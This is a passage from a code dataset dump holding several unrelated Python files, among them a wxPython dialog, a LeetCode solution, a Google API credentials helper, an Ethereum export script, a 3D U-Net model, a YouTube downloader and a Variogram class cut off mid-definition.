row = 0\n lbl_test = wx.StaticText(panel, label=\"Test:\") \n self.cbox_var_x = wx.ComboBox(panel, choices=[\"var1\",\"var2\"], value=\"var1\", style=wx.CB_READONLY)\n self.cbox_cond = wx.ComboBox(panel, choices=[\"==\",\"!=\"], value=\"==\", style=wx.CB_READONLY)\n self.cbox_var_y = wx.ComboBox(panel, choices=[\"var1\",\"var2\"], value=\"var2\", style=wx.CB_READONLY)\n grid3.Add(lbl_test, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=2)\n grid3.Add(self.cbox_var_x, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2)\n grid3.Add(self.cbox_cond, pos=(row,2), flag=wx.ALL|wx.EXPAND, border=2)\n grid3.Add(self.cbox_var_y, pos=(row,3), flag=wx.ALL|wx.EXPAND, border=2)\n \n row += 1 \n self.chk_match = wx.CheckBox(panel, label=\"Match case\")\n self.chk_match.SetValue(1)\n grid3.Add(self.chk_match, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n row += 2\n choices = [\"continue\",\"terminate\"]\n lbl_pass = wx.StaticText(panel, label=\"On Pass:\") \n self.cbox_onpass = wx.ComboBox(panel, choices=choices, value=\"continue\", style=wx.CB_READONLY)\n grid3.Add(lbl_pass, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=2)\n grid3.Add(self.cbox_onpass, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n row += 1\n lbl_failure = wx.StaticText(panel, label=\"On Failure:\") \n self.cbox_onfailure = wx.ComboBox(panel, choices=choices, value=\"continue\", style=wx.CB_READONLY)\n grid3.Add(lbl_failure, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=2)\n grid3.Add(self.cbox_onfailure, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n row += 2\n lbl_local = wx.StaticText(panel, label=\"Local Name:\")\n default = defaultname = \"test\"\n index = 1\n while defaultname in self._variables[\"locals\"]:\n defaultname = default + str(index)\n index += 1 \n self.text_local = wx.TextCtrl(panel, value=defaultname)\n grid3.Add(lbl_local, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=5)\n grid3.Add(self.text_local, pos=(row,1), span=(0,2), flag=wx.ALL|wx.EXPAND, border=5)\n \n row += 1\n lbl_global = wx.StaticText(panel, label=\"Global Name:\")\n self.text_global = wx.TextCtrl(panel, value=\"\")\n grid3.Add(lbl_global, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=5)\n grid3.Add(self.text_global, pos=(row,1), span=(0,2), flag=wx.ALL|wx.EXPAND, border=5)\n \n # grid3.AddGrowableCol(0)\n grid3.AddGrowableCol(1)\n grid3.AddGrowableCol(2)\n grid3.AddGrowableCol(3)\n # grid3.AddGrowableCol(4)\n \n sbox_sizer3.Add(grid3, 1, wx.ALL|wx.EXPAND, 0)\n \n #-----\n hsizer_controls = wx.BoxSizer(wx.HORIZONTAL)\n hsizer_controls.AddStretchSpacer()\n btn_cancel = wx.Button(panel, label=\"Cancel\", id=wx.ID_CANCEL)\n btn_cancel.Bind(wx.EVT_BUTTON, self.OnButton)\n self.btn_add = wx.Button(panel, label=\"Add\", id=wx.ID_OK)\n self.btn_add.Bind(wx.EVT_BUTTON, self.OnButton)\n # self.btn_add.Disable()\n hsizer_controls.Add(btn_cancel, 0, wx.ALL|wx.EXPAND, 5)\n hsizer_controls.Add(self.btn_add, 0, wx.ALL|wx.EXPAND, 5)\n \n #add to main sizer\n # sizer.Add(sbox_sizer, 0, wx.ALL|wx.EXPAND, 2)\n sizer.Add(hsizer, 0, wx.ALL|wx.EXPAND, 5)\n sizer.Add(sbox_sizer3, 1, wx.ALL|wx.EXPAND, 5)\n sizer.Add(hsizer_controls, 0, wx.ALL|wx.EXPAND, 5)\n \n panel.SetSizer(sizer) \n \n w, h = sizer.Fit(self)\n \n try:\n self.SetIcon(theme.GetIcon(\"psu_png\"))\n except:\n pass\n \n def OnVarTextChange(self, event):\n pass\n \n def OnVarSelected(self, event):\n e = event.GetEventObject()\n name = e.GetName()\n \n if name == \"var1\":\n tc = self.text_var1 \n elif name == \"var2\":\n tc = self.text_var2\n \n string = e.GetStringSelection()\n insertion = tc.GetInsertionPoint()\n value 
= tc.GetValue()\n \n newvalue = value[:insertion] + string + value[insertion:] \n tc.SetValue(newvalue)\n \n tc.SetInsertionPoint(insertion+len(string))\n \n def OnOperationButton(self, event):\n e = event.GetEventObject()\n label = e.GetLabel()\n name = e.GetName()\n if name == \"var1\": \n tc = self.text_var1\n elif name == \"var2\": \n tc = self.text_var2\n \n insertion = tc.GetInsertionPoint()\n value = tc.GetValue()\n \n newvalue = value[:insertion] + label + value[insertion:] \n tc.SetValue(newvalue)\n \n tc.SetInsertionPoint(insertion+len(label))\n \n def OnButton(self, event):\n e = event.GetEventObject()\n label = e.GetLabel()\n id = e.GetId()\n \n if label == \"Cancel\":\n self.EndModal(id) \n elif label == \"Add\": \n self.EndModal(id)\n\n def SetValue(self, data):\n params = data[\"parameters\"]\n params = \"), \" + params[1:-1] + \", (\" #so we can split it easier\n \n param_dict = {}\n \n params = params.split(\"), (\")\n \n for param in params: \n param = param[1: -1] \n if param == \"\":\n continue\n key, value = param.split(\"', '\")\n param_dict[key] = value\n \n self.text_var1.SetValue(param_dict[\"var1\"])\n self.text_var2.SetValue(param_dict[\"var2\"])\n self.cbox_onpass.SetValue(param_dict[\"onpass\"])\n self.cbox_onfailure.SetValue(param_dict[\"onfailure\"])\n \n \n if param_dict[\"matchcase\"] == \"True\":\n self.chk_match.SetValue(1)\n else:\n self.chk_match.SetValue(0)\n \n if param_dict[\"var1literal\"] == \"True\":\n self.chk_literal.SetValue(1)\n else:\n self.chk_literal.SetValue(0)\n \n if param_dict[\"var2literal\"] == \"True\":\n self.chk_literal2.SetValue(1)\n else:\n self.chk_literal2.SetValue(0)\n \n self.text_local.SetValue(data[\"local\"])\n self.text_global.SetValue(data[\"global\"])\n \n def GetValue(self):\n \n var1 = self.text_var1.GetValue()\n for char in var1:\n if char.isdigit() or char.isalpha():\n continue\n elif char in self.operations:\n continue\n elif char in [\".\", \"#\", \"?\", \">\", \"<\", \"[\", \"]\"]: \n continue\n \n var1 = var1.replace(char, \"\") \n \n var2 = self.text_var2.GetValue()\n for char in var2:\n if char.isdigit() or char.isalpha():\n continue\n elif char in self.operations:\n continue\n elif char in [\".\", \"#\", \"?\", \">\", \"<\", \"[\", \"]\"]:\n continue\n \n var2 = var2.replace(char, \"\") \n \n data = [(\"var1\", var1),\n (\"var2\", var2),\n (\"onpass\", self.cbox_onpass.GetValue()),\n (\"onfailure\", self.cbox_onfailure.GetValue()),\n (\"cond\", self.cbox_cond.GetValue()),\n (\"var1literal\", str(self.chk_literal.GetValue())),\n (\"var2literal\", str(self.chk_literal2.GetValue())), \n (\"matchcase\", str(self.chk_match.GetValue()))]\n \n data = {\"action\":\"String Compare\", \n \"parameters\":str(data)}\n \n local = self.text_local.GetValue()\n if local != \"\":\n for char in local:\n if char.isdigit() or char.isalpha():\n continue\n local = local.replace(char, \"_\") \n data[\"local\"] = local\n \n glob = self.text_global.GetValue()\n if glob != \"\":\n for char in glob:\n if char.isdigit() or char.isalpha():\n continue\n glob = glob.replace(char, \"_\") \n data[\"global\"] = glob\n \n return data ","sub_path":"dialogs/stringcompare.py","file_name":"stringcompare.py","file_ext":"py","file_size_in_byte":12043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"501884714","text":"from typing import List\n\n\nclass Solution:\n def exist(self, board: List[List[str]], word: str) -> bool:\n self.width = len(board[0])\n self.height = len(board)\n self.board = 
board\n self.word = word\n\n for i in range(self.height):\n for j in range(self.width):\n if self.backtrack(i, j, 0):\n return True\n return False\n\n def backtrack(self, i, j, p: int) -> bool:\n if i < 0 or i == self.height or j < 0 or j == self.width or self.word[p] != self.board[i][j]:\n return False\n\n if len(self.word) -1 == p:\n return True\n\n self.board[i][j] = \"#\"\n res = False\n for iOffset, jOffset in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n if self.backtrack(i + iOffset, j + jOffset, p+1):\n res = True\n break\n self.board[i][j] = self.word[p]\n return res\n\n\nif __name__ == \"__main__\":\n s = Solution()\n print(s.exist([[\"a\",\"a\"]], \"aaa\"), False)\n print(s.exist([[\"a\",\"b\"],[\"c\",\"d\"]], \"cdba\"), True)\n print(s.exist([[\"A\",\"B\",\"C\",\"E\"],\n [\"S\",\"F\",\"E\",\"S\"],\n [\"A\",\"D\",\"E\",\"E\"]], \"ABCESEEEFS\"), True)\n print(s.exist([[\"A\",\"B\",\"C\",\"E\"],\n [\"S\",\"F\",\"C\",\"S\"],\n [\"A\",\"D\",\"E\",\"E\"]], \"ABCB\"), False)\n print(s.exist([[\"A\",\"B\",\"C\",\"E\"],\n [\"S\",\"F\",\"C\",\"S\"],\n [\"A\",\"D\",\"E\",\"E\"]], \"ABCCED\"), True)","sub_path":"leetcode/p0079_word_search/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"542449461","text":"# -*- coding: utf-8 -*-\n#\n# Reference:\n# Python Quickstart https://developers.google.com/admin-sdk/directory/v1/quickstart/python\n#\n\nimport os.path\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\nfrom google_auth_oauthlib.flow import InstalledAppFlow\n\n# If modifying these scopes, delete your previously saved credentials \"./.credentials/\"\n\"\"\"\nSCOPES = [\n 'https://www.googleapis.com/auth/admin.directory.user',\n 'https://www.googleapis.com/auth/admin.directory.group',\n 'https://www.googleapis.com/auth/admin.directory.group.member'\n]\n\"\"\"\nSCOPES = [\n 'https://www.googleapis.com/auth/admin.directory.user.readonly',\n 'https://www.googleapis.com/auth/admin.directory.group.readonly',\n 'https://www.googleapis.com/auth/admin.directory.group.member.readonly'\n]\nCLIENT_SECRET_FILE = './client_secret.json'\nAPPLICATION_NAME = 'Google Directory API Python'\n\n\ndef get_credentials():\n\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n\n current_dir = os.path.expanduser('./')\n credential_dir = os.path.join(current_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n ##credential_path = os.path.join(credential_dir, 'token.pickle')\n credential_path = os.path.join(credential_dir, 'token.json')\n\n if os.path.exists(credential_path):\n creds = Credentials.from_authorized_user_file(credential_path, SCOPES)\n ##with open(credential_path, 'rb') as token:\n ## creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n CLIENT_SECRET_FILE, SCOPES)\n # Migrate the console strategy to the local server strategy\n # [Migrate your impacted OAuth out-of-band flow to an alternative method before Oct. 
3, 2022]\n # https://developers.google.com/identity/protocols/oauth2/resources/oob-migration\n # https://developers.google.com/identity/protocols/oauth2/native-app#request-parameter-redirect_uri\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open(credential_path, 'w') as token:\n token.write(creds.to_json())\n\n return creds\n","sub_path":"googlectl/credentials.py","file_name":"credentials.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115486665","text":"#!/usr/bin/env python3\nimport argparse\n\nfrom web3 import IPCProvider, Web3\n\nfrom ethereumetl.jobs.export_erc20_transfers_job import ExportErc20TransfersJob\nfrom ethereumetl.thread_local_proxy import ThreadLocalProxy\n\nparser = argparse.ArgumentParser(\n description='Exports ERC20 transfers using eth_newFilter and eth_getFilterLogs JSON RPC APIs.')\nparser.add_argument('-s', '--start-block', default=0, type=int, help='Start block')\nparser.add_argument('-e', '--end-block', required=True, type=int, help='End block')\nparser.add_argument('-b', '--batch-size', default=100, type=int, help='The number of blocks to filter at a time.')\nparser.add_argument('-o', '--output', default='-', type=str, help='The output file. If not specified stdout is used.')\nparser.add_argument('-w', '--max-workers', default=5, type=int, help='The maximum number of workers.')\nparser.add_argument('--ipc-path', required=True, type=str, help='The full path to the ipc socket file.')\nparser.add_argument('--ipc-timeout', default=300, type=int, help='The timeout in seconds for ipc calls.')\nparser.add_argument('-t', '--tokens', default=None, type=str, nargs='+',\n help='The list of token addresses to filter by.')\n\nargs = parser.parse_args()\n\njob = ExportErc20TransfersJob(\n start_block=args.start_block,\n end_block=args.end_block,\n batch_size=args.batch_size,\n web3=ThreadLocalProxy(lambda: Web3(IPCProvider(args.ipc_path, timeout=args.ipc_timeout))),\n output=args.output,\n max_workers=args.max_workers,\n tokens=args.tokens)\n\njob.run()\n","sub_path":"ethereum-etl/export_erc20_transfers.py","file_name":"export_erc20_transfers.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553155516","text":"import json\nimport random\n\n# Creates a random bar chart value.\n# 50% chance of having a value != 0. If it has a value,\n# it's a value between 0 and 1.\ndef newRandomValue():\n rand = random.uniform(0, 1)\n if rand > 0.5:\n return random.uniform(0, 1)\n else:\n return 0\n\n# Creates a random 'block' of bars.\n# 30% chance of having any bars. 
If it has bars, it uses\n# newRandomValue() to generate the bars.\ndef newRandomBlock(prefix):\n rand = random.uniform(0, 1)\n block = {}\n if rand > 0.7:\n block[prefix + '_mono_fine'] = newRandomValue()\n block[prefix + '_mono_coarse'] = newRandomValue()\n block[prefix + '_matt_painted'] = newRandomValue()\n block[prefix + '_impressed'] = newRandomValue()\n block[prefix + '_black_glazed'] = newRandomValue()\n else:\n block[prefix + '_mono_fine'] = 0\n block[prefix + '_mono_coarse'] = 0\n block[prefix + '_matt_painted'] = 0\n block[prefix + '_impressed'] = 0\n block[prefix + '_black_glazed'] = 0\n\n return block\n\ndef newRandomSpecialCategoryBlock():\n rand = random.uniform(0, 1)\n if rand > 0.8:\n return {\n 'archaika': newRandomValue(),\n 'defunct': newRandomValue(),\n 'miniatures': newRandomValue()\n }\n else:\n return {\n 'archaika': 0,\n 'defunct': 0,\n 'miniatures': 0\n }\n\n# Creates a random fingerprint row, using newRandomBlock\ndef newRandomRow():\n row = newRandomBlock('local')\n row.update(newRandomBlock('regional'))\n row.update(newRandomBlock('loc_reg'))\n row.update(newRandomBlock('import'))\n row.update(newRandomSpecialCategoryBlock())\n return row\n\n# Creates a new random assemblage fingerprint\ndef newRandomAssemblage():\n return {\n 'sector': '',\n 'layer_context': '',\n 'date': {\n 'from': 0,\n 'to': 0\n },\n 'fp_ceramic': {\n 'longterm_storage': newRandomRow(),\n 'shortterm_storage': newRandomRow(),\n 'preparation_cooking': newRandomRow(),\n 'food': newRandomRow(),\n 'mixing_drinks': newRandomRow(),\n 'serving_drinks': newRandomRow(),\n 'consuming_drinks': newRandomRow(),\n 'perfumes_fragrances': newRandomRow(),\n 'light': newRandomRow(),\n 'storage_non_edible': newRandomRow(),\n 'unidentified': newRandomRow()\n }\n }\n\nassemblages = [\n newRandomAssemblage(),\n newRandomAssemblage(),\n newRandomAssemblage(),\n newRandomAssemblage()\n]\n\nprint(json.dumps(assemblages, indent=2))\n","sub_path":"createDummyFP.py","file_name":"createDummyFP.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159739490","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.modules.padding import ReplicationPad3d, ReplicationPad3d\n\n\nclass Unet3D(nn.Module):\n \"\"\"EF segmentation network.\"\"\"\n\n def __init__(self, input_nbr, label_nbr):\n super(Unet3D, self).__init__()\n\n self.input_nbr = input_nbr\n\n self.conv11 = nn.Conv3d(input_nbr, 16, kernel_size=3, padding=1)\n self.bn11 = nn.BatchNorm3d(16)\n self.do11 = nn.Dropout3d(p=0.2)\n self.conv12 = nn.Conv3d(16, 16, kernel_size=3, padding=1)\n self.bn12 = nn.BatchNorm3d(16)\n self.do12 = nn.Dropout3d(p=0.2)\n\n self.conv21 = nn.Conv3d(16, 32, kernel_size=3, padding=1)\n self.bn21 = nn.BatchNorm3d(32)\n self.do21 = nn.Dropout3d(p=0.2)\n self.conv22 = nn.Conv3d(32, 32, kernel_size=3, padding=1)\n self.bn22 = nn.BatchNorm3d(32)\n self.do22 = nn.Dropout3d(p=0.2)\n\n self.conv31 = nn.Conv3d(32, 64, kernel_size=3, padding=1)\n self.bn31 = nn.BatchNorm3d(64)\n self.do31 = nn.Dropout3d(p=0.2)\n self.conv32 = nn.Conv3d(64, 64, kernel_size=3, padding=1)\n self.bn32 = nn.BatchNorm3d(64)\n self.do32 = nn.Dropout3d(p=0.2)\n self.conv33 = nn.Conv3d(64, 64, kernel_size=3, padding=1)\n self.bn33 = nn.BatchNorm3d(64)\n self.do33 = nn.Dropout3d(p=0.2)\n\n self.conv41 = nn.Conv3d(64, 128, kernel_size=3, padding=1)\n self.bn41 = nn.BatchNorm3d(128)\n self.do41 = nn.Dropout3d(p=0.2)\n self.conv42 = nn.Conv3d(128, 128, 
kernel_size=3, padding=1)\n self.bn42 = nn.BatchNorm3d(128)\n self.do42 = nn.Dropout3d(p=0.2)\n self.conv43 = nn.Conv3d(128, 128, kernel_size=3, padding=1)\n self.bn43 = nn.BatchNorm3d(128)\n self.do43 = nn.Dropout3d(p=0.2)\n\n\n self.upconv4 = nn.ConvTranspose3d(128, 128, kernel_size=3, padding=1, stride=2, output_padding=1)\n\n self.conv43d = nn.ConvTranspose3d(256, 128, kernel_size=3, padding=1)\n self.bn43d = nn.BatchNorm3d(128)\n self.do43d = nn.Dropout3d(p=0.2)\n self.conv42d = nn.ConvTranspose3d(128, 128, kernel_size=3, padding=1)\n self.bn42d = nn.BatchNorm3d(128)\n self.do42d = nn.Dropout3d(p=0.2)\n self.conv41d = nn.ConvTranspose3d(128, 64, kernel_size=3, padding=1)\n self.bn41d = nn.BatchNorm3d(64)\n self.do41d = nn.Dropout3d(p=0.2)\n\n self.upconv3 = nn.ConvTranspose3d(64, 64, kernel_size=3, padding=1, stride=2, output_padding=1)\n\n self.conv33d = nn.ConvTranspose3d(128, 64, kernel_size=3, padding=1)\n self.bn33d = nn.BatchNorm3d(64)\n self.do33d = nn.Dropout3d(p=0.2)\n self.conv32d = nn.ConvTranspose3d(64, 64, kernel_size=3, padding=1)\n self.bn32d = nn.BatchNorm3d(64)\n self.do32d = nn.Dropout3d(p=0.2)\n self.conv31d = nn.ConvTranspose3d(64, 32, kernel_size=3, padding=1)\n self.bn31d = nn.BatchNorm3d(32)\n self.do31d = nn.Dropout3d(p=0.2)\n\n self.upconv2 = nn.ConvTranspose3d(32, 32, kernel_size=3, padding=1, stride=2, output_padding=1)\n\n self.conv22d = nn.ConvTranspose3d(64, 32, kernel_size=3, padding=1)\n self.bn22d = nn.BatchNorm3d(32)\n self.do22d = nn.Dropout3d(p=0.2)\n self.conv21d = nn.ConvTranspose3d(32, 16, kernel_size=3, padding=1)\n self.bn21d = nn.BatchNorm3d(16)\n self.do21d = nn.Dropout3d(p=0.2)\n\n self.upconv1 = nn.ConvTranspose3d(16, 16, kernel_size=3, padding=1, stride=2, output_padding=1)\n\n self.conv12d = nn.ConvTranspose3d(32, 16, kernel_size=3, padding=1)\n self.bn12d = nn.BatchNorm3d(16)\n self.do12d = nn.Dropout3d(p=0.2)\n self.conv11d = nn.ConvTranspose3d(16, label_nbr, kernel_size=3, padding=1)\n\n self.sm = nn.LogSoftmax(dim=1)\n\n def forward(self, x):\n \"\"\"Forward method.\"\"\"\n xs = []#x[0].unsqueeze(2)\n for tens_x in x:\n xs.append(tens_x.unsqueeze(2))\n x = torch.cat(xs, 2)\n # Stage 1\n x11 = self.do11(F.relu(self.bn11(self.conv11(x))))\n x12 = self.do12(F.relu(self.bn12(self.conv12(x11))))\n x1p = F.max_pool3d(x12, kernel_size=(1,2,2), stride=2)\n\n # Stage 2\n x21 = self.do21(F.relu(self.bn21(self.conv21(x1p))))\n x22 = self.do22(F.relu(self.bn22(self.conv22(x21))))\n x2p = F.max_pool3d(x22, kernel_size=(1,2,2), stride=2)\n\n # Stage 3\n x31 = self.do31(F.relu(self.bn31(self.conv31(x2p))))\n x32 = self.do32(F.relu(self.bn32(self.conv32(x31))))\n x33 = self.do33(F.relu(self.bn33(self.conv33(x32))))\n x3p = F.max_pool3d(x33, kernel_size=(1,2,2), stride=2)\n\n # Stage 4\n x41 = self.do41(F.relu(self.bn41(self.conv41(x3p))))\n x42 = self.do42(F.relu(self.bn42(self.conv42(x41))))\n x43 = self.do43(F.relu(self.bn43(self.conv43(x42))))\n x4p = F.max_pool3d(x43, kernel_size=(1,2,2), stride=2)\n\n\n # Stage 4d\n x4d = self.upconv4(x4p)\n \n pad4 = ReplicationPad3d((0, x43.size(4) - x4d.size(4), 0, x43.size(3) - x4d.size(3), 0, x43.size(2) - x4d.size(2)))\n x4d = torch.cat((pad4(x4d), x43), 1)\n x43d = self.do43d(F.relu(self.bn43d(self.conv43d(x4d))))\n x42d = self.do42d(F.relu(self.bn42d(self.conv42d(x43d))))\n x41d = self.do41d(F.relu(self.bn41d(self.conv41d(x42d))))\n\n # Stage 3d\n x3d = self.upconv3(x41d)\n pad3 = ReplicationPad3d((0, x33.size(4) - x3d.size(4), 0, x33.size(3) - x3d.size(3), 0, x33.size(2) - x3d.size(2)))\n x3d = 
torch.cat((pad3(x3d), x33), 1)\n x33d = self.do33d(F.relu(self.bn33d(self.conv33d(x3d))))\n x32d = self.do32d(F.relu(self.bn32d(self.conv32d(x33d))))\n x31d = self.do31d(F.relu(self.bn31d(self.conv31d(x32d))))\n\n # Stage 2d\n x2d = self.upconv2(x31d)\n pad2 = ReplicationPad3d((0, x22.size(4) - x2d.size(4), 0, x22.size(3) - x2d.size(3), 0, x22.size(2) - x2d.size(2)))\n x2d = torch.cat((pad2(x2d), x22), 1)\n x22d = self.do22d(F.relu(self.bn22d(self.conv22d(x2d))))\n x21d = self.do21d(F.relu(self.bn21d(self.conv21d(x22d))))\n\n # Stage 1d\n x1d = self.upconv1(x21d)\n pad1 = ReplicationPad3d((0, x12.size(4) - x1d.size(4), 0, x12.size(3) - x1d.size(3), 0, x12.size(2) - x1d.size(2)))\n x1d = torch.cat((pad1(x1d), x12), 1)\n x12d = self.do12d(F.relu(self.bn12d(self.conv12d(x1d))))\n x11d = self.conv11d(x12d)\n final = F.max_pool3d(x11d, kernel_size=(x11d.shape[2],1,1), stride=1)\n \n return final.squeeze().unsqueeze(1)\n","sub_path":"time-dependent/segmentation/pytorch/models/siamese3d.py","file_name":"siamese3d.py","file_ext":"py","file_size_in_byte":6538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"285444518","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n__author__ = \"Jakub 'Gradam' Semik\"\n\n\nimport youtube_dl\nimport logging\nimport webbrowser\nimport sys\nimport io\n\nlogging.getLogger().setLevel(logging.ERROR)\n\n\nclass DownloadYt:\n # Downloads the video and/or audio stream of a YouTube URL via youtube_dl.\n def __init__(self, url, video, audio):\n self.url = url\n self.video = video\n self.audio = audio\n self.get_settings()\n self.download_result = io.StringIO()\n\n def start_download(self):\n if self.video:\n self.get_video()\n if self.audio:\n self.get_audio()\n\n\n def get_settings(self):\n self.path = ''\n\n\n def get_audio(self):\n options = {\n 'format': 'bestaudio/best',\n }\n\n # capture youtube_dl's console output instead of printing it\n self.download_result = io.StringIO()\n sys.stdout = self.download_result\n\n with youtube_dl.YoutubeDL(options) as ydl:\n ydl.download([self.url])\n\n sys.stdout = sys.__stdout__\n\n\n def get_video(self):\n options = {\n 'format': 'bestvideo/best'\n }\n\n self.download_result = io.StringIO()\n sys.stdout = self.download_result\n\n with youtube_dl.YoutubeDL(options) as ydl:\n # download() expects a list of URLs, not a bare string\n ydl.download([self.url])\n\n sys.stdout = sys.__stdout__\n\n\nclass DownloadTorrent:\n def __init__(self):\n pass\n\n @staticmethod\n def download_start(_, link):\n webbrowser.open(link)\n\n\n\n
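# Usage sketch (hypothetical URL; not part of the original script):\n#   d = DownloadYt('https://www.youtube.com/watch?v=XXXXXXXXXXX', video=False, audio=True)\n#   d.start_download()\n#   print(d.download_result.getvalue())\n\n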
def main():\n # quick manual test with a dummy URL (kept from the original)\n a = DownloadYt('hsdfsghfdfgxA', video=True, audio=False)\n print(a)\n\nif __name__ == '__main__':\n main()","sub_path":"Downloader.py","file_name":"Downloader.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"176972630","text":"#!/usr/bin/env python\n\nfrom setuptools import setup, find_packages\n\npackages = [\n 'django_env_server',\n 'django_env_server.management',\n 'django_env_server.management.commands',\n]\n\nsetup(\n name='django_env_server',\n version='0.0.2',\n packages=packages,\n license='MIT',\n description='Load environment variables into the Django development server',\n long_description='Load environment variables into the Django development server',\n author='Matt Foster',\n author_email='matt@mcfstr.com',\n url='https://github.com/mcfstr/django-env-server',\n install_requires=['django >= 1.4'],\n)\n","sub_path":"pypi_install_script/django_env_server-0.0.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"75265114","text":"\"\"\"\nVariogram class\n\"\"\"\n\nfrom skgstat.distance import nd_dist\nfrom skgstat.binning import binify_even_width, binify_even_bin, group_to_bin\nfrom skgstat.estimator import matheron, cressie, dowd, genton, minmax, entropy\nfrom skgstat.models import spherical, exponential, gaussian, cubic, stable, matern\nimport numpy as np\nfrom pandas import DataFrame\nimport copy\nimport matplotlib.pyplot as plt\nfrom matplotlib.axes import SubplotBase\nfrom scipy.optimize import curve_fit\n\n\nclass Variogram(object):\n \"\"\"\n Variogram representation.\n\n This class can generate a Semivariogram from a given sample.\n By default, the sample point pairs are ordered into even-width bins,\n separated by the Euclidean distance of the point pairs.\n The semivariance in a bin is calculated by the Matheron estimator\n and a spherical variogram function is fitted by least squares to the experimental variogram.\n\n The distance matrix, bin matrix, semi-variance estimator and theoretical variogram function can all be changed on\n instantiation. The Variogram class can be used to return the result data, plot the Variogram, estimate the\n kriging weights and create a Kriging instance.\n\n \"\"\"\n
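 # Minimal usage sketch (coords/vals are hypothetical sample data, not part of skgstat):\n #   V = Variogram(coordinates=coords, values=vals, N=10)\n #   print(V.describe())\n #   V.plot()\n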
 def __init__(self, coordinates=None, values=None, dm_func=nd_dist, bm_func=binify_even_width,\n estimator=matheron, model=spherical, dm=None, bm=None, normalize=True, fit_method='lm',\n pec_punish=1.0, is_directional=False, azimuth=0, tolerance=45.0, use_nugget=False, maxlag=None,\n N=None, verbose=False):\n \"\"\"\n\n :param coordinates: numpy array or list with the coordinates of the sample as tuples\n :param values: numpy array or list with the values of the sample. If ndim > 1, an aggregator is used\n :param dm_func: function which is used to calculate the distance matrix\n :param bm_func: function which is used to calculate the binning matrix\n :param estimator: estimator can be a function or a string identifying a standard estimator\n Supported are 'matheron', 'cressie', 'dowd', 'genton', 'minmax' or 'entropy'\n :param model: string or callable with the theoretical variogram function\n :param dm: numpy array with the distance matrix of the given sample\n :param bm: numpy array with the binning matrix of the given sample\n :param normalize: boolean, specify if the lag should be given absolute or relative to the maxlag\n :param fit_method: The method for fitting the theoretical model.\n Either 'lm' for least squares or 'pec' for point exclusion cost\n :param pec_punish: If 'pec' is the fit_method, give the power of punishing the point exclusion.\n 1 applies the full punishment; 0 disables it.\n :param is_directional: boolean, set True to calculate a direction-dependent variogram\n :param azimuth: azimuth angle in degrees used when is_directional is True\n :param tolerance: tolerance angle in degrees around the azimuth\n :param use_nugget: boolean, set if nugget effect shall be used\n :param maxlag: maximum lag distance; values below 1 are taken relative to the maximum distance\n :param N: number of bins\n :param verbose: boolean, print additional status output\n \"\"\"\n\n # Set coordinates and values\n self._X = list(coordinates)\n self.values = list(values)\n\n # set verbosity\n self.verbose = verbose\n\n # if values is given with ndim > 1, set an aggregator\n self.agg = np.nanmean\n\n # bm properties\n self.maxlag = maxlag\n self._bm_kwargs = {}\n self._dm_kwargs = {}\n\n # save the functions, if the matrices are not given\n if dm is None:\n self.dm_func = dm_func\n else:\n self._dm = dm\n\n if bm is None:\n self.bm_func = bm_func\n else:\n self._bm = bm\n\n # estimator can be a function or a string identifying a standard estimator\n self.set_estimator(estimator=estimator)\n\n # model can be a function or a string identifying a standard variogram function\n self.set_model(model=model)\n\n # specify if the lag should be given absolute or relative to the maxlag\n self.normalized = normalize\n\n # set the fitting method and model quality measure\n self.fit_method = fit_method\n self.pec_punish = pec_punish\n\n # set directionality\n self.is_directional = is_directional\n self.azimuth = azimuth # Set is_directional as True if azimuth is given?\n self.tolerance = tolerance\n\n # set if nugget effect shall be used\n self.use_nugget = use_nugget\n\n # set binning matrix if N was given\n if N is not None:\n self.set_bm(N=N)\n\n @property\n def estimator(self):\n return self._estimator\n\n @estimator.setter\n def estimator(self, value):\n self.set_estimator(estimator=value)\n\n def set_estimator(self, estimator):\n \"\"\"\n Set estimator as the new Variogram estimator. Either a function returning a single or a list of semivariance\n values is needed, or a string identifying a default one.\n Supported are 'matheron', 'cressie', 'dowd', 'genton', 'minmax' or 'entropy'.\n \"\"\"\n if isinstance(estimator, str):\n if estimator.lower() == 'matheron':\n self._estimator = matheron\n elif estimator.lower() == 'cressie':\n self._estimator = cressie\n elif estimator.lower() == 'dowd':\n self._estimator = dowd\n elif estimator.lower() == 'genton':\n self._estimator = genton\n elif estimator.lower() == 